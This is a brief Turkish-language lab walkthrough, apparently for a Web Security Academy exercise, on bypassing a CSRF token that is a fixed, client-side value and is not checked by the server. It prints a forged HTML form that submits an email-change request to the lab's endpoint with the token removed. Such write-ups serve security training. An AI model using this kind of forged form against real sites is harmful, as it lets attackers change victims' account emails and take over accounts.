Bu bölümde CSRF tokeninin sunucu taraflı oluşturulmadığı (sabit değer) için ortaya çıkan zafiyete bakacağız.
1.Lab ortamından farkı CSRF tokeninin eklenmesi fakat sunucuyla bir işi olmadığından,client tarafında çalıştığından dolayı kolayca atlatılabilir.
<form class="login-form" action="https://ac9a1faa1f62469b80601bf2008c00d3.web-security-academy.net/email" method="GET">
<label>Email</label>
<input required type="email" name="email" value="offsec@msn.com">
//CSRF tokeni burdaydı ve kaldırdık.
<button class='button' type='submit'> Update email </button>
</form>
Her şeyi doğru yaptıysanız muhtemelen başarılı olacaksınız.
Sorularınız için yorum yapmayı unutmayın.
English
Arabic
Chinese (Simplified)
Dutch
French
German
Italian
Portuguese
Russian
Spanish
Turkish